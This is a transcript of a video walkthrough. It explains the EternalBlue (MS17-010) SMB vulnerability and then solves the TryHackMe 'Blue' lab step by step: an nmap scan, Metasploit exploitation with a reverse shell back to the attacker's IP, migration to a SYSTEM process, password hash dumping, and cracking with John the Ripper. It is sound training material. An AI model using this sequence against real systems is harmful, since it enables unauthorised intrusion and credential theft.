In this video, we're going to be going over the EternalBlue exploit, or otherwise known as MS17010. So, all about this exploit. Where did it come from? It was developed by the NSA and not disclosed for about 5 years. It's planned to be used by the NSA as a defense mechanism, but was released by a group of hackers known as shadow brokers. So, what is it? It is a vulnerability in Microsoft's implementation of the server message block SMB protocol. So Windows mishandles specially crafted packets from remote attackers, and it allows remote execution of code on the target computer. So it's classified as CVE 2017-0144, and we have the MITRE link here. And when we go here, we can see SMB version 1 server in Microsoft, and it gives a bunch of different versions of Windows. And it says it allows remote attackers to execute arbitrary code via crafted packets. And then we have a bunch of links down here that point us towards a bunch of different payloads and methods that we can use to exploit this specific vulnerability. Noted attacks. The timeline of this goes as follows. In 2016, it was used by a Chinese hacking group called Buckeye. March 2017, patches and dissemination. So Microsoft begins patching. Microsoft releases MS17010, which is the security bulletin, which we have a link for right here. So if we go over to the security bulletin, we see that we have a bunch of different stuff about it, essentially what we saw in MITRE. But if we scroll a little bit down, we see that these are all the affected operating systems and the vulnerabilities associated with this. And we have critical remote code execution for almost all of them. So this is a pretty big one. So in April of 2017, shadow brokers stole software from the NSA. They publicly released the vulnerabilities along with several other hacking tools. In May 2017, WannaCry ransomware attack. Ransomware was deployed through EternalBlue to attack unpatched systems. June 2017, NotPaya, a cyber attack utilized EternalBlue on unpatched systems, similar to the WannaCry ransomware attack. Tifi in September of 2017 was a banking Trojan. February of 2018, EternalBlue Metasploit modules were released. So this was publicly available and pretty easy for people that know how to use Metasploit to execute. And then we have the end of 2018, and millions of systems were still vulnerable at this point. So impact. We saw that this affected a wide range of Windows systems. Recommendation: what should we do to make sure that this doesn't happen to us? Patch your systems. Systems were vulnerable for years simply because no one ran an update. It's as simple as that. The security updates really do play a really big benefit. So, our practical. TryHackMe has a room that we have a link for here. It's called Blue. And we can go to tryhackme.com/room/blue to get to the Blue room. Okay, so let's log in. So once we log in to TryHackMe, we can join the room. And if we scroll down a little bit, we can start the machine. So scan the machine. If you're unsure how to tackle this, I recommend checking out the Nmap room. So there is an Nmap room here if you don't know how to use Nmap. We're waiting for the IP address to come up. That'll be in about 5 seconds. Let's log into our Kali Linux virtual machine. If you don't know what I'm talking about, there should be a link at the top of the screen that'll take you to a video that shows you how to create a Kali Linux virtual machine. Once we're in, let's update our VM really quick. While this is updating, we can Control Shift and O, and let's go ahead and let's connect to our TryHackMe VPN. So if we want to do that, we can go over to our TryHackMe folder. So cd over into THM-ls, and we have this username.ovpn file. So in order to connect to this file, we're going to use sudo openvpn and its dot complete the file name with tab. and enter. If you don't know how to do this, there is a link at the top of the screen show you how to connect to the TryHackMe instance with OpenVPN. Once we see this initialization sequence completed, we know that we're on the right track, we're connected. If we Control Shift and O again, we have another window. Control and scroll in to make it bigger. If we want to verify that we are connected to the TryHackMe network, we can ping 10.10.10.10. And we're getting a response, so we know that we are connected to this guy. Let's go over to our TryHackMe room, and we have this target IP address. So if we copy that to the clipboard and we do a basic nmap on this. So we're going to say nmap -ss-sv-vvv, and then we're going to paste in that IP address with Control Shift and V. This should give us what we're looking for. Let's go ahead and look at that hint that's provided to us here. And the only thing that it is recommending is this script vuln portion. So let's copy that out. Let's add that in there. So here, Control Shift and V. That should be okay. So let's just break this down one more time. So SS is a SYN scan. That's the most basic scan that you can do. SV, we're trying to enumerate versions. -VVV is very verbose. That's as much data as you can get while you're trying to view the results of your scan. We also have script, which is referring to the Nmap scripting engine, which is going to pull a script vuln. And that will basically determine if our endpoint is vulnerable to a variety of things. And then the IP address of the virtual machine in which we are attacking. So if we enter, we see Nmap scripting engine has started pre-scanning, running level 1 of 2 scan, initiating the Nmap scripting engine, and there it goes. And we see we're getting a bunch of open ports already. We have 445, 139, and 135. I think that's what we need for one of the first questions. So let's go back over here. We scan the machine. Yes. How many ports are open with a port under 1000? There were 3 of those. What is this machine vulnerable to? We already know that this is vulnerable to MS 17-010, and we did that research beforehand with this bulletin. Gain access. Okay, so in order to gain a foothold on the machine, we are going to use Metasploit. So you can do this exploit without Metasploit, but this makes it a whole lot easier. So start Metasploit. There is a link to a Metasploit pathway. If you click on this, we can see there are a couple of rooms. The introduction, exploitation, and Meterpreter. So go check those out if you can. But we can also see Metasploit is an open source penetration testing framework that helps security professionals find and exploit vulnerabilities in computer systems. It includes a database of known vulnerabilities and tools and scripts for exploiting them. So it's like an application that you can use to hack systems. Complete. Find the exploitation code we will run against the machine. What is the full path of the code? And then they give us a little hint right here. So if we go back over here, we see that Nmap is still scanning the machine. We don't really need to do too much of this, so we can actually Control C to end that since we kind of already know where we're going. If we scroll up, we can actually see the open ports. 445, 139, 135, that's NetBIOS and SMB. So if we want to start Metasploit, we're going to type in msf console. Okay, so Metasploit has kind of a weird command line that it uses. So if we want to see what we can do with it, we can type in question mark. And let's make this a little smaller so we can see what we're doing. And if we scroll up, we see that there are a bunch of these commands that we can use to do various things, right? So what we want to do is we want to find certain things. So if we scroll a little down, we can actually see this search option. So if we search, we can look for things by keywords. We want to find vulnerabilities associated with MS17010. So if we type in search MS17-010, we actually get results that correlate to the SMB exploits EternalBlue MS17010. So we see there's one right here, and it can go based on whatever version of Windows you're trying to target. So default, I believe, is going to be the automatic target, but you can also choose one of these sub options under the exploit. We have our exploit, and this should answer our next question. So let's go ahead and copy that out, and we'll paste it in here. Okay, so it says show options and set the one required value. What is the name of the value? So if we go back over here, we can select our exploit by saying use and the number right next to it. So we can say use 0, and it'll configure a default payload along with the exploit of our choosing. So if we say show options, we see that there are a bunch of options here on the left. Now, if we look here, there's a required section, and anytime it says yes, it means it needs a parameter in this current setting field right here. So we see that there is a yes next to our hosts, and we're going to need to set this. And if we scroll down, yes, but this is already set. Yes, but this is already set. Same thing for all of these ones. Now, one last thing that I want to mention about this is the lhost. Now, by default, it's going to give your NATed IP address, but what you want is your VPN IP address. So if we Control Shift and O, we can make this bigger, and we can say ifconfig. And if we scroll up, we can see this TUN0 IP. TUN stands for tunneling, and that's what VPNs do, because they're encrypting the connection. But we see this inet 10.13.54.246. Now, this is the old school way of doing it. You can totally just look up here and you can see your VPN IP next to this lock icon. We're going to Control Shift and W to close that out. And we're going to say set lhost to 10.13.54.246. And then we're going to say set our hosts to, and we're going to copy this target IP address out, and we're going to paste it in here. Control Shift and V, enter, and then show options. And we see that we have 10.10.94.4, and that's our target IP address as the R hosts. We also have 10.13.54.246, and again, you can also see the IP up here. Now, if we want to just run it, we can say run, or we can sound like cool hackers and type in exploit. And rough. We can see that it did a scanner, and it says it's likely vulnerable to MS17010. Target is vulnerable. Sending all but the last fragment of the exploit packet. SMB version 2 buffers. Okay, so if you ever get multiple failures like this and it just exits out on you, then the next step would be to restart all your connections. So let's end our TryHackMe connection. Let's sudo openvpn back into our VPN file. Initialization sequence completed, so we're good on that front. Scroll this up. And then let's go back over to TryHackMe. Let's terminate the virtual machine. and let's spin up a new one. So we'll go over to task 1, start the machine, and give it a few moments to load. Okay, so we have the new IP put in here, and we're going to set the R host to that, and we're going to say show options and verify one last time. So we scroll up, we see 10.10.2.162, 10.10.2.162, and we also have 10.13.54.246, 10.13.54.246. Okay, cool. So now if we want to try one more time, we can exploit. And we have a shell. So if we say pwd, we can see that we are in Windows System 32. If we say ls, then we get everything in that folder that we're in. So if we type in question mark, we can see that we have a bunch of different options that we can work with. For all intents and purposes, we are actually sitting on the machine right now. Let's see what else we have to do for this lab. So to gain access, our next question is show options and set the one required value. That was our hosts. Usually it would be fine to run the exploit as is. However, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter. So the payload is already set for shell reverse TCP. So we can say complete. And we did run the exploit. So confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background the shell with Control Z. If this has failed, you may have to reboot the target VM. So we can say complete, and the only thing we really need to do now is Control and V. And so we're going to background the session with Y. If we type in sessions, we see that we have this Meterpreter by 64 Windows on John PC. So if we go back over into TryHackMe, now let's escalate privileges. So let's upgrade shells in Metasploit. If you haven't already background the previously gained shell, research online how to convert a shell to Meterpreter shell in Metasploit. What is the name of the post module we will use? So we already have a Meterpreter shell. We can actually go back over into this and we can look for what it's talking about. So it's saying how to convert a shell to Meterpreter. If you don't have a Meterpreter shell already loaded in Metasploit, we can actually look for shell to Meterpreter. So if we go back over, we can say search, and we can Control-Shift-V, and let's put underscores between these two because that's how it's kind of formatted. So if we type in enter, we see we have this post multi-managed shell to Meterpreter. So if we wanted to see the options on 0, we would type in info 0, and it would give us everything that we need. So we see that it requires a session number. So we would put our session number in here, and we would run this, and it would upgrade our shell to a Meterpreter session if it was able to. But in our case, we don't really need to do that. We can actually just switch back over into our session. So sessions, sessions 1. Okay, so now we're sitting on the computer in a Meterpreter shell. So let's go back over here and we can say that it was shell to Meterpreter, right? So post multi-managed shell to Meterpreter. Copy that out, put this here. So what option are we required to change? That's going to be sessions. Set the required options. You may need to list all the sessions to find your target here. We don't need to do that since we already have Meterpreter. Run. If this doesn't work, try completing the exploit from the previous task once more. Once the Meterpreter shell conversion completes, select that session for use. Verify that we have escalated to NT authority system. Run get system to confirm this. Feel free to open a DOS shell via the command shell and run who am I. This should return that we are indeed system. Background the shell afterwards and select our interpreter session for usage again. Okay, cool. So let's run get system. And we're already running as system. We can also type in shell. And we can say, who am I? And we see that we're NT authority system. So this pretty much means that we can do whatever we want on the computer. Let's go ahead and back out of this. And let's go back over to TryHackMe. Okay, so we know that we're good on this stuff. List all of the processes running via the PS command. And we're going to look for a process at the bottom of the list that is running as NT authority system. We're going to write down the process ID, and we're going to migrate that process in the next step. So if we go back over here and we type in PS, we can see all of the processes that are running at this time. So look at the bottom of the list, and let's go over into this vds.exe. So 2552 is the PID. So we can say complete. So we're going to migrate to the process ID by typing in migrate. And we're going to type in with process ID the 2552. And it says access is denied. So let's try a different one. Let's go over into search indexer, actually. 2724. 3020. 1296. Let's try this Amazon SSM agent 1396. Okay, so we migrated successfully, and so we can complete that. And now cracking. Okay, so within our elevated interpreter shell, run the command #dump. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? So if we go back over and we type in #dump, we get 3 entries. We have administrator, guest, and John. So the name of the user is John. So copy this password hash to a file and research how to crack it. What is the crack password? Okay, so let's go back over into here. So for this, I am going to open a new window in my Terminator session, and we are going to paste in this command here. So what is this command? So we are going to use John the Ripper. We're going to use the format of NT. We're going to use a word list, and we're going to use rockyou.txt, and that's found in user share word lists rockyou.txt. And we're going to use a text file called john.txt. So let's actually make that text file now. Let's open a new one, and let's ls, and we can say nano john.txt. Cool. Now let's copy this value into john.txt. If we exit and we say y, enter, and cat out john.txt, we have our value. Sweet. So we can actually Control Shift and W to exit that, and we should be good to go. So if we hit enter, we see we have a password. Let's copy that out and let's paste it in here. Success. Okay, so now we need to go and we need to find the 3 flags that are planted on the machine. These are not traditional flags, rather they're meant to represent key locations within the Windows systems. Use the hints provided below to complete the room. Okay, cool. So flag, this system can be found at system root. Okay, that's easy enough. We can Control Shift and W to get out of that, and we can say shell, and we can cd over into the root directory, which is going to be c:\\. Okay, and we're going to say dir, and we see we have flag1.txt. Wait, so we can say exit, and we can say pwd. Okay, cd and back one directory there again, and then we have flag.txt, so we can cat that out. Cat flag 1.txt. Sweet. Okay, so now we can copy this value out, and that is our first flag. Windows doesn't really like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate, restart the machine, and rerun the exploit to find the flag. Relatively rare, however, it can happen. So we're going to search -f, and we're going to search for the string flag to txt. If it takes too long, we can always exit that, and we can do this the old-fashioned way. So let's type in shell, and let's go ahead and kind of explore around a little bit. So dir will give us a bunch of folders. Let's go over into users and over into John. And let's go look in his documents. And we have our third flag. So if we type in more, flag3.txt, there we are. We weren't quite there yet, but we got it early. So let's go ahead and put in flag 3. Let's go and look for the second flag. Now let's try one more time to search for that flag with my interpreter. So we can say search -f flag clue.txt. And there it is. We see that it is in the config folder. So let's go ahead and shell cd over into Windows System 32, and then cd over into config, and more flag2.txt, and there we are. SAM database elevated access. Let's copy that out. Let's put it back over in here. And congratulations, we have completed Blue. Thank you so much for watching, and until next time, see ya.